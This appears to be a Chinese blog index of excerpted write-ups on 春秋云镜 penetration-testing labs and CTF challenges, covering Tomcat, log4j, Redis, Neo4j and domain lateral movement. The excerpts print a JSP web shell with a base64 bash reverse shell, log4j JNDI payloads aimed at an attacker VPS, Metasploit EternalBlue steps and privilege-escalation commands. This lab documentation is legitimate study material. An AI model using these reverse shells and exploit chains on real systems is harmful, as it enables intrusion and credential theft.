春秋云镜-Spoofing
春秋云镜-Spoofingflag01
进来是个后台管理页面
扫目录发现是tomcat
http://39.101.188.249:8080/docs/
版本是9.0.30
搜索发现存在CNVD-2020-10487漏洞
之前iscc打过,直接利用这个脚本打
但是我们需要有恶意文件才能包含从而获取权限,因此我们需要找到一个上传接口,正好在web.xml中发现接口UploadTestServlet,访问发现是上传文件接口,上传反弹shell文件,内容如下
1<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(&q ...
Cs流量出题
83433ea486119d7dc207c4e82ca6353e1b74aacdae3cff7174398ea6d1f64e1c865ef7a501384ed9e6fc8542feffa55666e13bc38c1576fda4624d4eaf68ac544b2d0b059eb74ceefc31d153627b753f387da642b4fbf1ea2a82ce1712ca5ba69f4b1b226ee07d9f05f44216400320bc6ccc9d68ba697928c17e08ca351b110dcd71787f9e9a356de763ff5fe6375275a4e1cf714720a3b230eb7d3cacec1f19e5a3a9e448c6ca99300c832814fa39ab92fd1cb1e6a41f3baa7e470a87ce200936a8fa402a21eec615b1a4e3c5f77ef48226bf699a30a0c880e57e542493fcae517c7e1178e7af5b804fa6e61444ea4cd939ac6b2bd3addee ...
渗透技巧小记录
渗透技巧小记录Nmap常用命令1234567nmap 192.168.0.1/24 //扫描网段下的地址nmap -sV -A 192.168.131.82 //基础的探测服务命令,端口及对应服务nmap -sS -sV -sC -p- 192.168.131.82-oN nmap_full_scan //SYN扫描,比较隐秘,文件会保存nmap -A -v -sV -T5 -p- --script=http-enum 192.168.131.82 //扫目录nmap --script=auth 192.168.0.101 //弱口令nmap --script=vuln 192.168.0.101 //扫描常见漏洞nmap --script=brute 192.168.0.101 //暴力破解
Fscan常用命令123456789101112fscan -h ipfscan -h ip -o 1.txt //保存到指定文件-p 1-65537 // 指定端口-m ssh -p 2222 -m ms17010 (指定模块) //指定模块ssh和端口-hf ip.t ...
春秋云镜-Privilege
春秋云镜-Privilege
靶标介绍:
在这个靶场中,您将扮演一名资深黑客,被雇佣来评估虚构公司 XR Shop 的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用,并通过后渗透技巧深入 XR Shop 的内部网络,寻找潜在的弱点和漏洞,并通过滥用 Windows 特权获取管理员权限,最终并获取隐藏在其内部的核心机密。该靶场共有 4 个 Flag,分布于不同的靶机。
flag01
请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。
先是fscan扫扫看看
发现www.zip,利用代码审计
发现在/tools/content-log.php存在任意文件读取
123456789<?php$logfile = rawurldecode( $_GET['logfile'] );// M ...
内网横向记录
内网横向记录MS17_010内网机器中存在永恒之蓝漏洞,利用kali自带的msf即可攻击
123456proxychains msfconsoleuse exploit/windows/smb/ms17_010_eternalblueshow payloads set payload windows/x64/meterpreter/bind_tcp_uuid //设置payloadset RHOSTS 172.22.1.21 //设置目标地址ipexploit
成功之后会有交互式shell
哈希传递攻击拿到用户的NTLM Hash值后可以进行哈希传递
原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。
其中重要的是windows使用系统API(LsaLogonUser)生成hash进行认证,而不是用明文,所以利用hash即可模拟用户登录进行操作。还有的是如果密码长度大于15就不存在LM Hash,从windows2008开始微软默认禁用LM hash。
这类攻击适用于:
域/工作组环境
可以获得hash,但是条件不允许对 ...
春秋云镜-Exchange
春秋云镜-Exchange前言好久没打了春秋云镜的靶场了,来打个靶场回顾回顾
打攻防摸鱼的时候打的 嘻嘻
flag01上fscan搜集一波
8000端口有ERP
借鉴华夏ERPhttps://mp.weixin.qq.com/s?__biz=Mzg2OTg5NjE5MQ==&mid=2247484475&idx=1&sn=deee0c3bc0b9fe10b89af784947aa1a3&chksm=ce975eabf9e0d7bd5c952c462883fa89eafaadfba829dd2058fccb135a5a6970e29fe6487e1a&scene=126&sessionid=1686528295&key=42e64e73470f56ada54bd87e00fbb9ee86826bf40b566f978fb0f0e311c0eb4ab318884991ba35ad361aa1595ed3bd0846512b2fe73e212c0c074eb836d443f457f9ea24f06bf67d68ba10b149db1 ...
春秋云镜Certify
春秋云镜Certifyflag01信息搜集
访问8983端口,发现solr利用了log4j配置,那就打log4jRCE
payload
1${jndi:ldap://101.34.80.152:1389/rxiwph}
vps 启动
12345java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 101.34.80.152 -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"nc -lvvp 9999
反弹shell后,找了一圈没有flag,进行提权操作
1sudo -l
sudo -l提权发现grc
1sudo grc --help
grc 是一个通用的颜色器,它可以根据配置文件为命令行工具的输出添加颜色,使得输出更加易于阅读和区分。以下选项:
-e 或 - ...
春秋云镜Delegation
春秋云镜Delegationflag01开局是个cms先看看后台弱口令,好家伙,
admin/123456直接登上了
有本地文件包含漏洞
123456789POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1Host: 39.101.167.165Content-Length: 81X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0Content-Type: application/x-www-form-urlencoded;Cookie: PHPSESSID=os9kli93e59pjclq4361kaairm; loginfalse74c6352c5a281ec5947783b8a186e225=1; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313sid=#data_d_.._d_.._d_.._d_ ...
春秋云镜-Brute4Road
春秋云镜-Brute4Roadflag01信息搜集
看到开放了6379端口,redis,很明显要打redis了
redid常见利用方式:
一.利用ssh_keygen登录服务器
条件:
1、Redis服务使用ROOT账号启动
2、服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。
二、利用计划任务反弹shell
条件:
root启用Redis
redis无密码或者弱密码
三、Redis直接写webshell
条件:
知道网站绝对路径,并且需要增删改查权限
root启动redis
redis弱密码或者无密码
四、Redis主从复制getshell
条件:
Redis 版本(4.x~5.0.5)(新增模块功能,可以通过C语言并编译出恶意.so文件)
redis弱密码或者无密码
root启动redis
五.结合SSRF进行利用
条件:
root启用redis
目标机存在dict协议
知道网站绝对路径
redis无密码或者弱密码
六、redis写lua
测试尝试进行写反弹任务
123456redis-cli -h 192.168.33.134 ...
春秋云镜Time
春秋云镜Timeflag01端口扫描
7687和7474是neo4j,直接找cve
https://github.com/zwjjustdoit/CVE-2021-34371.jar?tab=readme-ov-file
1java -jar rhino_gadget.jar rmi://39.99.224.197:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"
flag02将fscan,frp下载到靶机
服务器python起http服务就行
123python3 -m http.server 8080wget http://101.34.80.152:8080/frpc.ini
查看ip
1234172.22.6.12 域控172.22.6.25 域内机器172.22.6.36 当前机器172.22.6.38 ...
春秋云镜Tsclient
春秋云镜Tsclient##flag01
fscan扫一扫
弱口令mssql
先执行命令,发现不行需要激活插件,上方激活组件即可
在此路径发现有可写权限,cs上马
这里卡了半天(后面做题慢慢发觉是cs回连间隔太长,调小一点就好
1C:/Users/Public/sweetpotato.exe -a "type C:\Users\Administrator\flag\flag01.txt"
我直接在MDUT执行
后边cs也行了,链接不咋稳定
flag02在运行一次马提升个权限
1shell c:\\users\\public\\sweetpotato.exe -a "c:\\users\\public\\beacon.exe"
信息搜集
1shell net user
12345678hashdump[*] Tasked beacon to dump hashes[+] host called home, sent: 82549 bytes[+] received password hashes:Administrator: ...
Fastjson1268 Jdbc打mysql
c77546477099cff473e9bbacb8de14d221eb8a8ec540a1f2d0fe28c512bc227ddcc8c3a843e56f17d81d77ebd63676b0bf7188b57dacf394f29ce0f75bb15052bd382744eff411b8a548dc6c446ee6789e98f7e6172dd25d0a04f8c4fe99afb28d8651e4859f7dce71e3100786ac8fe89ebe82e9f4d5f8dacd88e7c832911f2a8bc21c53d2d8871698de25321e85de4a7ac7f47a82baa3fd8e5065dd7ed1d35694a4b81e991dc64da1a945d7a8f4f9bcae091cb2ffc7bc89e815f56c1d5e5c502d3408f67c08ceb8000d061b1883523e0e430fd81b828c00dcc21741c606220b2da602132e92fcf9ad1af8011ffe7b7aca5f81fe1c946d45c ...